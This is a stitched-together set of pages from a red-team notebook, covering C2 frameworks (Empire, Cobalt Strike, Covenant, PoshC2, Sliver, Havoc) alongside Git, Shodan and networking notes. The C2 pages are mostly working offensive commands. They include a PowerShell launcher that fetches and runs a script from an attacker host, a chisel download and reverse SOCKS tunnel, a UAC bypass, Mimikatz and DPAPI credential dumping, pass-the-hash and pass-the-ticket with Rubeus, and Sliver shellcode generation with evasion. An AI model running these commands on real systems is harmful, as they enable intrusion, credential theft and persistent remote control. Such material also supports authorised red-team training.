Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe beacon> execute-assembly Rubeus.exe ptt /luid:0x1337 /ticket: beacon> beacon> steal_token 1337 Copy beacon> rportfwd 8443 10.10.13.37 443 Copy beacon> rportfwd_local 8080 127.0.0.1 80 Copy beacon> socks 1080 $ ssh -tt -v -L 9050:localhost:1080 root@teamserver Copy beacon> ls C:\Users\snovvcrash\AppData\Local\Microsoft\Credentials Copy beacon> run vaultcmd /listcreds:"Windows Credentials" /all beacon> mimikatz vault::list Copy beacon> mimikatz dpapi::cred /in:C:\Users\snovvcrash\AppData\Local\Microsoft\Credentials\ Copy beacon> ls C:\Users\snovvcrash\AppData\Roaming\Microsoft\Protect\ Copy beacon> mimikatz dpapi::masterkey /in:C:\Users\snovvcrash\AppData\Roaming\Microsoft\Protect\ /rpc Copy beacon> mimikatz dpapi::cred /in:C:\Users\snovvcrash\AppData\Local\Microsoft\Credentials\ /masterkey: --- # Unknown \> For the complete documentation index, see \[llms.txt\](https://ppn.snovvcra.sh/llms.txt). Markdown versions of documentation pages are available by appending \`.md\` to page URLs; this page is available as \[Markdown\](https://ppn.snovvcra.sh/pentest/c2/covenant.md). # Covenant \* \* ## Install \`\`\` $ git clone --recurse-submodules https://github.com/cobbr/Covenant $ cd Covenant/Covenant $ dotnet run \`\`\` ## Cheatsheet Make a sacrificial token to be used with Over-PtH attacks: \`\`\` (snovvcrash) > MakeToken administrator megacorp.local dummy\_Passw0rd! \`\`\` --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the \`ask\` query parameter: \`\`\` GET https://ppn.snovvcra.sh/pentest/c2/covenant.md?ask= \`\`\` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections. --- # Havoc | Pentester's Promiscuous Notebook For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt) . This page is also available as [Markdown](https://ppn.snovvcra.sh/pentest/c2/havoc.md) . * [https://github.com/HavocFramework/Havoc](https://github.com/HavocFramework/Havoc) [](https://ppn.snovvcra.sh/pentest/c2/havoc#install) Install ----------------------------------------------------------------- * [https://havocframework.com/docs/installation](https://havocframework.com/docs/installation) Copy $ sudo apt install -y git build-essential apt-utils cmake libfontconfig1 libglu1-mesa-dev libgtest-dev libspdlog-dev libboost-all-dev libncurses5-dev libgdbm-dev libssl-dev libreadline-dev libffi-dev libsqlite3-dev libbz2-dev mesa-common-dev qtbase5-dev qtchooser qt5-qmake qtbase5-dev-tools libqt5websockets5 libqt5websockets5-dev qtdeclarative5-dev golang-go qtbase5-dev libqt5websockets5-dev python3-dev libboost-all-dev mingw-w64 nasm $ git clone https://github.com/HavocFramework/Havoc /opt/Havoc && cd /opt/Havoc && git checkout dev $ cd teamserver $ go mod download golang.org/x/sys $ go mod download github.com/ugorji/go $ cd .. $ make $ ./havoc server --profile profiles/havoc.yaotl -v [--debug] [--debug-dev] $ ./havoc client [](https://ppn.snovvcra.sh/pentest/c2/havoc#malleable-c2-profiles) Malleable C2 Profiles --------------------------------------------------------------------------------------------- * [https://github.com/Ghost53574/havoc\_profile\_generator](https://github.com/Ghost53574/havoc_profile_generator) Last updated 2 years ago * [Install](https://ppn.snovvcra.sh/pentest/c2/havoc#install) * [Malleable C2 Profiles](https://ppn.snovvcra.sh/pentest/c2/havoc#malleable-c2-profiles) --- # Unknown \> For the complete documentation index, see \[llms.txt\](https://ppn.snovvcra.sh/llms.txt). Markdown versions of documentation pages are available by appending \`.md\` to page URLs; this page is available as \[Markdown\](https://ppn.snovvcra.sh/pentest/c2/empire.md). # Empire \* \* ## Install \`\`\` $ git clone --recursive https://github.com/BC-SECURITY/Empire.git $ cd Empire $ sudo ./setup/install.sh $ sudo poetry install \`\`\` To compile C# agents (\[Covenant\](https://github.com/cobbr/Covenant) and \[Sharpire\](https://github.com/0xbadjuju/Sharpire)) \[install\](https://docs.microsoft.com/en-us/dotnet/core/install/linux-debian#supported-distributions) .NET SDK 3.1: \`\`\` $ wget https://packages.microsoft.com/config/debian/10/packages-microsoft-prod.deb -O packages-microsoft-prod.deb $ sudo dpkg -i packages-microsoft-prod.deb $ rm packages-microsoft-prod.deb $ sudo apt-get update; \\ sudo apt-get install -y apt-transport-https && \\ sudo apt-get update && \\ sudo apt-get install -y dotnet-sdk-3.1 $ sudo apt-get update; \\ sudo apt-get install -y apt-transport-https && \\ sudo apt-get update && \\ sudo apt-get install -y aspnetcore-runtime-3.1 \`\`\` ## Run \`\`\` $ ./ps-empire server \[--restip 127.0.0.1 --username snovvcrash --password 'Passw0rd!'\] $ ./ps-empire client \`\`\` Reset the database: \`\`\` $ ./ps-empire server --reset \`\`\` ## Cheatsheet Basic PowerShell launcher string: \`\`\` PS > powershell -NoP -sta -NonI -W Hidden -Exec Bypass -C "IEX(New-Object Net.WebClient).DownloadString('http://10.10.13.37/launcher.ps1')" \`\`\` Prepare a listener: \`\`\` (Empire) > listeners (Empire: listeners) > uselistener http (Empire: uselistener/http) > set Name http1 (Empire: uselistener/http) > set Host 10.10.13.37 (Empire: uselistener/http) > set Port 80 (Empire: uselistener/http) > execute \`\`\` Generate a PowerShell stager: \`\`\` (Empire: listeners) > usestager multi/launcher (Empire: usestager/multi/launcher) > set Listener http1 (Empire: usestager/multi/launcher) > set OutFile pwsh.ps1 (Empire: usestager/multi/launcher) > generate \`\`\` Generate a C# stager: \`\`\` (Empire: listeners) > useplugin csharpserver (Empire: useplugin/csharpserver) > set status start (Empire: useplugin/csharpserver) > execute (Empire: useplugin/csharpserver) > usestager windows/csharp\_exe (Empire: usestager/windows/csharp\_exe) > set Listener http1 (Empire: usestager/windows/csharp\_exe) > set OutFile csharp.exe (Empire: usestager/windows/csharp\_exe) > generate \`\`\` Re-inject into an interactive process (e. g., \`explorer.exe\`): \`\`\` (Empire: listeners) > agents (Empire: agents) > rename LKH7SD3V A1 (Empire: agents) > interact A1 (Empire: A1) > sysinfo (Empire: A1) > shell Get-Process explorer (Empire: A1) > psinject exch \`\`\` Bypass UAC to get a high integrity process: \`\`\` (Empire: A1) > shell whoami /priv (Empire: A1) > usemodule privesc/bypassuac\_fodhelper (Empire: powershell/privesc/bypassuac\_fodhelper) > set Listener http1 (Empire: powershell/privesc/bypassuac\_fodhelper) > run \`\`\` Execute a PowerShell script from memory (e. g., \[\`Invoke-SharpSecDump.ps1\`\](https://github.com/S3cur3Th1sSh1t/PowerSharpPack/blob/master/PowerSharpBinaries/Invoke-SharpSecDump.ps1)): \`\`\` (Empire: A1) > shell whoami /priv (Empire: A1) > usemodule management/invoke\_script (Empire: powershell/management/invoke\_script) > set ScriptPath /home/snovvcrash/tools/dump.ps1 (Empire: powershell/management/invoke\_script) > set ScriptCmd Invoke-SharpSecDump -C "-tager=127.0.0.1" (Empire: powershell/management/invoke\_script) > run \`\`\` Start a process in the background (e. g., \[chisel\](https://github.com/jpillora/chisel) SOCKS proxy): \`\`\` (Empire: A1) > shell IWR http://10.10.13.37:8080/chisel.exe -OutFile C:\\Windows\\services.exe -UseBasicParsing (Empire: A1) > shell Start-Process -NoNewWindow -FilePath C:\\Windows\\services.exe -ArgumentList "client 10.10.13.37:8000 R:socks" \`\`\` Invoke a custom Mimikatz command: \`\`\` (Empire: A1) > usemodule credentials/mimikatz/command (Empire: powershell/credentials/mimikatz/command) > set Command '"privilege::debug" "token::elevate" "ts::logonpasswords" "exit"' (Empire: powershell/credentials/mimikatz/command) > run \`\`\` ## Plugins \* \* ## Customizing Agents \* --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the \`ask\` query parameter: \`\`\` GET https://ppn.snovvcra.sh/pentest/c2/empire.md?ask= \`\`\` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections. --- # Unknown \> For the complete documentation index, see \[llms.txt\](https://ppn.snovvcra.sh/llms.txt). Markdown versions of documentation pages are available by appending \`.md\` to page URLs; this page is available as \[Markdown\](https://ppn.snovvcra.sh/pentest/c2/cobalt-strike.md). # Cobalt Strike \* \* Run as a daemon: {% tabs %} {% tab title="Service Unit" %} {% code title="/etc/systemd/system/cobaltstrike.service" %} \`\`\` \[Unit\] Description=CobaltStrike After=network.target StartLimitIntervalSec=0 \[Service\] Type=simple Restart=on-failure RestartSec=3 User=root ExecStart=/opt/CobaltStrike/start.sh \[Install\] WantedBy=multi-user.target \`\`\` {% endcode %} {% endtab %} {% tab title="Start Script" %} {% code title="/opt/CobaltStrike/start.sh" %} \`\`\`bash #!/bin/bash CS\_IP=\`hostname -I | awk '{print $1}'\` CS\_PASS='Passw0rd1!' CS\_PATH='/opt/CobaltStrike' rm -{f} "${CS\_PATH}/Profiles/random\_c2\_profile/output/\*.profile" CS\_PROFILE=\`cd "${CS\_PATH}/Profiles/random\_c2\_profile"; python3 ./random\_c2profile.py | tail -1 | awk -F/ '{print $2}'\` if \[ ! -f "${CS\_PATH}/cobaltstrike.store" \]; then /usr/bin/keytool -keystore ./cobaltstrike.store -storepass 'Passw0rd2!' -keypass 'Passw0rd2!' -genkey -keyalg RSA -alias cobaltstrike -dname 'CN=google.com, O=Google Inc, L=Mountain View, ST=California, C=US' fi ${CS\_PATH}/TeamServerImage -Dcobaltstrike.server\_port=1337 -Dcobaltstrike.server\_bindto="${CS\_IP}" -Djavax.net.ssl.keyStore=./cobaltstrike.store -Djavax.net.ssl.keyStorePassword='Passw0rd2!' teamserver "${CS\_IP}" "${CS\_PASS}" "${CS\_PATH}/Profiles/random\_c2\_profile/output/${CS\_PROFILE}" \`\`\` {% endcode %} {% endtab %} {% endtabs %} ## Malleable C2 Profiles \* \* ### SourcePoint \* \`\`\` $ ./SourcePoint -Host www.microsoft.com -Forwarder -Sleep 20 -Jitter 20 -Injector NtMapViewOfSection -Stage False -Syscall Indirect -Outfile test.profile \`\`\` ## Aggressor Scripts \* \* \* ## Community Kit \* ## P2P Beacons Beacon TCP and Beacon SMB are Peer-to-Peer beacons which means they're used to chain a connection to an existent beacon. They act like bind shells and waits for the attacker to connect to them. Connect to a TCP beacon: \`\`\` beacon> connect \`\`\` Connect to an SMB beacon: \`\`\` beacon> link \`\`\` ## DNS Beacons \* Create an \`A\` record \`ns66.example.com\` pointing to IP address of the redirector and then an \`NS\` record pointing to \`ns66.example.com\`. {% hint style="warning" %} Before starting a DNS listener, the localhost resolver should be shut down if necessary: \`sudo systemctl disable systemd-resolved --now\`. {% endhint %} ### socat Redirector On the redirector: \`\`\` $ sudo socat -T 1 udp4-listen:53,fork tcp4::5353 \`\`\` On the team server: \`\`\` $ socat -T 10 tcp4-listen:5353,fork udp4:127.0.0.1:53 \`\`\` ### iptables Redirector {% tabs %} {% tab title="Add" %} {% code title="dns-forwarder-on.sh" %} \`\`\`bash sudo sh -c 'echo 1 > /proc/sys/net/ipv4/ip\_forward' sudo iptables -I INPUT -p udp -m udp --dport 53 -j ACCEPT sudo iptables -t nat -A PREROUTING -m state --state NEW --protocol udp --destination --destination-port 53 -j MARK --set-mark 0x400 sudo iptables -t nat -A PREROUTING -m mark --mark 0x400 --protocol udp -j DNAT --to-destination :53 sudo iptables -t nat -A POSTROUTING -m mark --mark 0x400 -j MASQUERADE sudo iptables -I FORWARD -j ACCEPT \`\`\` {% endcode %} {% endtab %} {% tab title="Delete" %} {% code title="dns-forwarder-off.sh" %} \`\`\`bash sudo sh -c 'echo 0 > /proc/sys/net/ipv4/ip\_forward' sudo iptables -D INPUT -p udp -m udp --dport 53 -j ACCEPT sudo iptables -t nat -D PREROUTING -m state --state NEW --protocol udp --destination --destination-port 53 -j MARK --set-mark 0x400 sudo iptables -t nat -D PREROUTING -m mark --mark 0x400 --protocol udp -j DNAT --to-destination :53 sudo iptables -t nat -D POSTROUTING -m mark --mark 0x400 -j MASQUERADE sudo iptables -D FORWARD -j ACCEPT \`\`\` {% endcode %} {% endtab %} {% endtabs %} ### DNSMasq Redirector \* ## Overpass-the-Hash More opsec PtH than builtin \`pth\` command (which does the Mimikatz \`sekurlsa::pth\` thing with named pipe impersonation): \`\`\` beacon> mimikatz sekurlsa::pth /user:snovvcrash /domain:megacorp.local /ntlm:fc525c9683e8fe067095ba2ddc971889 beacon> steal\_token 1337 \`\`\` Same with Rubeus (must be in elevated context): \`\`\` beacon> execute-assembly Rubeus.exe asktgt /user:snovvcrash /domain:megacorp.local /aes256:94b4d075fd15ba856b4b7f6a13f76133f5f5ffc280685518cad6f732302ce9ac /nowrap /opsec /createnetonly:C:\\Windows\\System32\\cmd.exe beacon> steal\_token 1337 \`\`\` Use Rubeus with lower privileges: \`\`\` beacon> execute-assembly Rubeus.exe asktgt /user:snovvcrash /domain:megacorp.local /aes256:94b4d075fd15ba856b4b7f6a13f76133f5f5ffc280685518cad6f732302ce9ac /nowrap /opsec PS > \[System.IO.File\]::WriteAllBytes("C:\\Windows\\Tasks\\tgt.kirbi", \[System.Convert\]::FromBase64String("")) Or $ echo -en "" | base64 -d > tgt.kirbi beacon> run klist Or beacon> execute-assembly Rubeus.exe klist beacon> make\_token MEGACORP\\snovvcrash dummy\_Passw0rd! beacon> kerberos\_ticket\_use C:\\Windows\\Tasks\\tgt.kirbi \`\`\` ## Pass-the-Ticket Create a sacrificial process, import the TGT into its logon session and steal its security token: \`\`\` beacon> execute-assembly Rubeus.exe createnetonly /program:C:\\Windows\\System32\\cmd.exe beacon> execute-assembly Rubeus.exe ptt /luid:0x1337 /ticket: beacon> beacon> steal\_token 1337 \`\`\` ## Pivoting Make any traffic hitting port \*\*8443\*\* on Victim to be redirected to \*\*10.10.13.37\*\* on port \*\*443\*\* (traffic flows through the team server): \`\`\` beacon> rportfwd 8443 10.10.13.37 443 \`\`\` Make any traffic hitting port \*\*8080\*\* on Victim to be redirected to \*\*localhost:80\*\* on Attacker (traffic flows through the CS client): \`\`\` beacon> rportfwd\_local 8080 127.0.0.1 80 \`\`\` Forward SOCKS server's port from team server to the client: \`\`\` beacon> socks 1080 $ ssh -tt -v -L 9050:localhost:1080 root@teamserver \`\`\` ## Credentials ### DPAPI List credential blobs: \`\`\` beacon> ls C:\\Users\\snovvcrash\\AppData\\Local\\Microsoft\\Credentials \`\`\` List vault credentials: \`\`\` beacon> run vaultcmd /listcreds:"Windows Credentials" /all beacon> mimikatz vault::list \`\`\` Check which master keys correspond to credential blobs (look for \*\*guidMasterKey\*\* field with GUID): \`\`\` beacon> mimikatz dpapi::cred /in:C:\\Users\\snovvcrash\\AppData\\Local\\Microsoft\\Credentials\\ \`\`\` The master key is stored here: \`\`\` beacon> ls C:\\Users\\snovvcrash\\AppData\\Roaming\\Microsoft\\Protect\\ \`\`\` Decrypt the master key via RPC on the Domain Controller and show it: \`\`\` beacon> mimikatz dpapi::masterkey /in:C:\\Users\\snovvcrash\\AppData\\Roaming\\Microsoft\\Protect\\ /rpc \`\`\` Decrypt the blob with decrypted master key: \`\`\` beacon> mimikatz dpapi::cred /in:C:\\Users\\snovvcrash\\AppData\\Local\\Microsoft\\Credentials\\ /masterkey: \`\`\` ## Evasion \* \[\\\[PDF\\\] Avoiding Memory Scanners (Kyle Avery, @kyleavery)\](https://www.blackhillsinfosec.com/avoiding-memory-scanners/) \* {% embed url="" %} ### Sleep Mask {% content-ref url="/pages/8e4raVMUUKuvkovvRZBS#shellcode-in-memory-fluctuation-obfuscate-and-sleep" %} \[Code Injection\](/red-team/dev/code-injection.md#shellcode-in-memory-fluctuation-obfuscate-and-sleep) {% endcontent-ref %} \* \* \* ## Detection \* --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the \`ask\` query parameter: \`\`\` GET https://ppn.snovvcra.sh/pentest/c2/cobalt-strike.md?ask= \`\`\` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections. --- # PoshC2 | Pentester's Promiscuous Notebook For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt) . This page is also available as [Markdown](https://ppn.snovvcra.sh/pentest/c2/poshc2.md) . * [https://github.com/nettitude/PoshC2](https://github.com/nettitude/PoshC2) * [https://labs.nettitude.com/blog/detecting-poshc2-indicators-of-compromise/](https://labs.nettitude.com/blog/detecting-poshc2-indicators-of-compromise/) * [https://xakep.ru/2023/08/18/interstellar-c2/](https://xakep.ru/2023/08/18/interstellar-c2/) * [\[PDF\] A Deep Dive Into a PoshC2 Implant (Vlad Pasca)](https://resources.securityscorecard.com/all/poshc2-implant) [](https://ppn.snovvcra.sh/pentest/c2/poshc2#install) Install ------------------------------------------------------------------ Copy $ curl -sSL https://github.com/nettitude/PoshC2/raw/dev/Install.sh | sudo bash -s -- -p /opt/PoshC2 -b dev [](https://ppn.snovvcra.sh/pentest/c2/poshc2#run) Run ---------------------------------------------------------- List projects: Copy $ posh-project -l Show current project: Copy $ posh-project -c Create a new project: Copy $ posh-project -n Adjust config: Copy $ posh-config Start team server: Connect to the team server: [](https://ppn.snovvcra.sh/pentest/c2/poshc2#cheatsheet) Cheatsheet ------------------------------------------------------------------------ [Load](https://poshc2.readthedocs.io/en/latest/usage/loadingmodules.html) .NET assembly and run it (available for agents that load CLR): Last updated 2 years ago * [Install](https://ppn.snovvcra.sh/pentest/c2/poshc2#install) * [Run](https://ppn.snovvcra.sh/pentest/c2/poshc2#run) * [Cheatsheet](https://ppn.snovvcra.sh/pentest/c2/poshc2#cheatsheet) Copy $ posh-server Copy $ posh -u snovvcrash Copy C# 01> loadmodule /tmp/Rubeus.exe C# 01> run-exe Namespace.Class Assembly C# 01> run-exe Rubeus.Program Rubeus kerberoast /usetgtdeleg /format:hashcat --- # Basics | Pentester's Promiscuous Notebook For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt) . This page is also available as [Markdown](https://ppn.snovvcra.sh/red-team/basics.md) . > _"Everything is stealthy until someone is looking for it."_ (Lee Chagolla-Christensen, [@tifkin\_](https://twitter.com/tifkin_) > ) * [https://redteam.guide/](https://redteam.guide/) * [https://malcomvetter.medium.com/how-to-create-an-internal-corporate-red-team-1023027ea1e3](https://malcomvetter.medium.com/how-to-create-an-internal-corporate-red-team-1023027ea1e3) * [https://sokarepo.github.io/redteam/2024/01/04/increase-your-stealth-capabilities-part1.html](https://sokarepo.github.io/redteam/2024/01/04/increase-your-stealth-capabilities-part1.html) * [https://sokarepo.github.io//redteam/2024/01/04/increase-your-stealth-capabilities-part2.html](https://sokarepo.github.io//redteam/2024/01/04/increase-your-stealth-capabilities-part2.html) [](https://ppn.snovvcra.sh/red-team/basics#tactics) Tactics ---------------------------------------------------------------- * [https://blog.binary-offensive.com/warcon-2022-modern-initial-access-and-evasion-tactics/](https://blog.binary-offensive.com/warcon-2022-modern-initial-access-and-evasion-tactics/) * [\[PDF\] WarCon22 - Modern Initial Access and Evasion Tactics (Mariusz Banach)](https://mgeeky.tech/uploads/WarCon22%20-%20Modern%20Initial%20Access%20and%20Evasion%20Tactics.pdf) ### [](https://ppn.snovvcra.sh/red-team/basics#cisa-red-team) CISA Red Team * [https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-059a](https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-059a) * [https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-326a](https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-326a) 1MB [CISA Red Team Shares Key Findings.pdf](https://1743652255-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MZ5E8Fq0UBQAc7rbfId%2Fuploads%2Fgit-blob-e5e0b730063c9ea646c6f2cf7863c14e3578c3a8%2FCISA%20Red%20Team%20Shares%20Key%20Findings.pdf?alt=media) PDF Download[Open](https://1743652255-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MZ5E8Fq0UBQAc7rbfId%2Fuploads%2Fgit-blob-e5e0b730063c9ea646c6f2cf7863c14e3578c3a8%2FCISA%20Red%20Team%20Shares%20Key%20Findings.pdf?alt=media) 824KB [Enhancing Cyber Resilience - Insights from CISA Red Team Assessment of a US Critical Infrastructure Sector Organization.pdf](https://1743652255-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MZ5E8Fq0UBQAc7rbfId%2Fuploads%2Fgit-blob-975c59cb82153cc7724c44d336b84e7197d8199d%2FEnhancing%20Cyber%20Resilience%20-%20Insights%20from%20CISA%20Red%20Team%20Assessment%20of%20a%20US%20Critical%20Infrastructure%20Sector%20Organization.pdf?alt=media) PDF Download[Open](https://1743652255-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MZ5E8Fq0UBQAc7rbfId%2Fuploads%2Fgit-blob-975c59cb82153cc7724c44d336b84e7197d8199d%2FEnhancing%20Cyber%20Resilience%20-%20Insights%20from%20CISA%20Red%20Team%20Assessment%20of%20a%20US%20Critical%20Infrastructure%20Sector%20Organization.pdf?alt=media) [](https://ppn.snovvcra.sh/red-team/basics#rtfm) RTFM ---------------------------------------------------------- * [https://github.com/leostat/rtfm](https://github.com/leostat/rtfm) * [\[PDF\] Red Team Field Manual v3](https://github.com/tanc7/hacking-books/blob/master/RTFM%20-%20Red%20Team%20Field%20Manual%20v3.pdf) Last updated 1 year ago * [Tactics](https://ppn.snovvcra.sh/red-team/basics#tactics) * [CISA Red Team](https://ppn.snovvcra.sh/red-team/basics#cisa-red-team) * [RTFM](https://ppn.snovvcra.sh/red-team/basics#rtfm) --- # Git | Pentester's Promiscuous Notebook For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt) . This page is also available as [Markdown](https://ppn.snovvcra.sh/admin/git.md) . Add SSH key to the ssh-agent: Copy $ eval "$(ssh-agent -s)" $ ssh-add ~/.ssh/id_rsa Update to latest version: Copy $ sudo add-apt-repository ppa:git-core/ppa -y $ sudo apt update $ sudo apt install git -y $ git version Show global origin config: Copy $ git config --list --show-origin [](https://ppn.snovvcra.sh/admin/git#pull-requests) Pull Requests ---------------------------------------------------------------------- Syncing a forked repository: Copy # Add remote upstream $ git remote add upstream https://github.com/original/repository.git $ git fetch upstream $ git rebase upstream/master (or git merge upstream/master) # Update fork from original repo $ git pull upstream master # Push the updates to fork $ git push -f origin master Working with a repository during a pull request: [](https://ppn.snovvcra.sh/admin/git#signing-git-commits) Signing Git Commits ---------------------------------------------------------------------------------- * [https://www.youtube.com/watch?v=1vVIpIvboSg](https://www.youtube.com/watch?v=1vVIpIvboSg) * [https://www.youtube.com/watch?v=4166ExAnxmo](https://www.youtube.com/watch?v=4166ExAnxmo) Cache passphrase in gpg agent (dirty): [](https://ppn.snovvcra.sh/admin/git#submodules) Submodules ---------------------------------------------------------------- * [https://tech.serhatteker.com/post/2019-01/changing-git-submodules-urlbranch-to/](https://tech.serhatteker.com/post/2019-01/changing-git-submodules-urlbranch-to/) Edit submodule branch: Last updated 4 years ago * [Pull Requests](https://ppn.snovvcra.sh/admin/git#pull-requests) * [Signing Git Commits](https://ppn.snovvcra.sh/admin/git#signing-git-commits) * [Submodules](https://ppn.snovvcra.sh/admin/git#submodules) Copy $ git remote add upstream https://github.com/original/repository.git $ git fetch upstream $ git rebase upstream/master $ git checkout upstream/master $ git checkout -b new-feature ...Make changes... $ gc -am "Add a new feature" $ git push -u origin new-feature Copy $ cd /tmp && touch aaa && gpg --sign aaa && rm aaa aaa.gpg && cd - Copy $ git config --file=.gitmodules -l | grep branch $ git config --file=.gitmodules submodule.Submod.branch development $ git submodule sync $ git submodule update --init --recursive --remote --- # BOF | Pentester's Promiscuous Notebook For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt) . This page is also available as [Markdown](https://ppn.snovvcra.sh/exploit-dev/bof.md) . [OSCP BOF](https://ppn.snovvcra.sh/exploit-dev/bof/oscp-bof) [OSED SEH Overflow](https://ppn.snovvcra.sh/exploit-dev/bof/osed-sehof) Last updated 2 years ago --- # Sliver | Pentester's Promiscuous Notebook For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt) . This page is also available as [Markdown](https://ppn.snovvcra.sh/pentest/c2/sliver.md) . * [https://github.com/BishopFox/sliver](https://github.com/BishopFox/sliver) * [https://bishopfox.com/blog/passing-the-osep-exam-using-sliver](https://bishopfox.com/blog/passing-the-osep-exam-using-sliver) [](https://ppn.snovvcra.sh/pentest/c2/sliver#install) Install ------------------------------------------------------------------ * [https://github.com/BishopFox/sliver/releases/latest](https://github.com/BishopFox/sliver/releases/latest) Install team server as a daemon on the team server: Copy $ curl https://sliver.sh/install | sudo bash For a client get a `sliver-client` binary from releases or disable the service if installed as a daemon: Copy $ sudo systemctl disable sliver.service --now [](https://ppn.snovvcra.sh/pentest/c2/sliver#configure-team-server-for-multiplayer) Configure Team Server for Multiplayer ------------------------------------------------------------------------------------------------------------------------------ * [https://github.com/BishopFox/sliver/wiki/Configuration-Files](https://github.com/BishopFox/sliver/wiki/Configuration-Files) Change [multiplayer](https://github.com/BishopFox/sliver/wiki/Multiplayer-Mode) listener host (daemon mode) and restart: Copy $ sudo vi /root/.sliver/configs/server.json $ sudo systemctl restart sliver.service Generate config for a new operator: Copy $ sudo /root/sliver-server operator --name snovvcrash-kali-home --lhost --lport 31337 --save snovvcrash_.cfg [](https://ppn.snovvcra.sh/pentest/c2/sliver#cheatsheet) Cheatsheet ------------------------------------------------------------------------ A redirector-aware pair of payload and listener (when redirecting to `PRIVATE_IP:8443`): Last updated 2 years ago * [Install](https://ppn.snovvcra.sh/pentest/c2/sliver#install) * [Configure Team Server for Multiplayer](https://ppn.snovvcra.sh/pentest/c2/sliver#configure-team-server-for-multiplayer) * [Cheatsheet](https://ppn.snovvcra.sh/pentest/c2/sliver#cheatsheet) Copy sliver > generate [beacon] [--seconds 45] [--jitter 5] --os windows --arch amd64 --format shellcode [--evasion] [--disable-sgn] --http example.com:443 [--limit-datetime "Thu, 01 Jan 1970 00:00:00 MSK"] [--limit-domainjoined] [--limit-hostname VICTIM-PC] [--limit-username victim.user] --name victimpc --save /home/snovvcrash/www/shellcode.bin sliver > https --domain example.com --lhost --lport 8443 --- # Shodan | Pentester's Promiscuous Notebook For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt) . This page is also available as [Markdown](https://ppn.snovvcra.sh/pentest/osint/shodan.md) . * [https://www.shodan.io/](https://www.shodan.io/) * [https://dorks.s1rn3tz.ovh/shodandorks](https://dorks.s1rn3tz.ovh/shodandorks) Copy $ shodan init $ shodan count vuln:cve-1984-31337 $ shodan download out.json.gz vuln:cve-1984-31337 [--limit 1000] $ gzip -d out.json.gz $ shodan parse out.json --fields=ip_str,port > out.txt Find hosts by SSL certs, useful for searching exposed RDPs with an AD FQDN: Copy ssl.cert.subject.cn:"ad.megacorp.local" ssl.cert.subject.alt:"ad.megacorp.local" Last updated 1 year ago --- # Networking | Pentester's Promiscuous Notebook For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt) . This page is also available as [Markdown](https://ppn.snovvcra.sh/admin/networking.md) . * [https://linkmeup.ru/blog/11.html](https://linkmeup.ru/blog/11.html) * [https://habr.com/ru/post/307252/](https://habr.com/ru/post/307252/) * [https://kbespalov.medium.com/виртуальные-сетевые-устройства-в-linux-linux-bridge-7e0e887edd01](https://kbespalov.medium.com/%D0%B2%D0%B8%D1%80%D1%82%D1%83%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5-%D1%81%D0%B5%D1%82%D0%B5%D0%B2%D1%8B%D0%B5-%D1%83%D1%81%D1%82%D1%80%D0%BE%D0%B9%D1%81%D1%82%D0%B2%D0%B0-%D0%B2-linux-linux-bridge-7e0e887edd01) [](https://ppn.snovvcra.sh/admin/networking#log-connections) Log Connections --------------------------------------------------------------------------------- ### [](https://ppn.snovvcra.sh/admin/networking#tcpdump-tshark) tcpdump / tshark Register ICMP replies from 10.10.13.38: Copy $ sudo tcpdump -n -i eth0 -XSs 0 'src 10.10.13.38 and icmp[icmptype]==8' Redirect to text file adding timestamps: Copy $ sudo tcpdump -i eth0 -tttt -l icmp | tee icmp.txt ### [](https://ppn.snovvcra.sh/admin/networking#iptables) iptables Add rule to register **new** (does not watch for related, established) connections to your machine: Copy $ sudo iptables -A INPUT -p tcp -m state --state NEW -j LOG --log-prefix "IPTables New-Connection: " -i tun0 Check the logs: Copy $ sudo grep IPTables /var/log/messages Delete rule: Copy $ sudo iptables -D INPUT -p tcp -m state --state NEW -j LOG --log-prefix "IPTables New-Connection: " -i tun0 [](https://ppn.snovvcra.sh/admin/networking#tools) Tools ------------------------------------------------------------- ### [](https://ppn.snovvcra.sh/admin/networking#dhclient) dhclient Release the current lease on `eth0` and obtain a fresh IP via DHCP in Linux: ### [](https://ppn.snovvcra.sh/admin/networking#iptables-1) iptables * [https://www.booleanworld.com/depth-guide-iptables-linux-firewall/](https://www.booleanworld.com/depth-guide-iptables-linux-firewall/) * 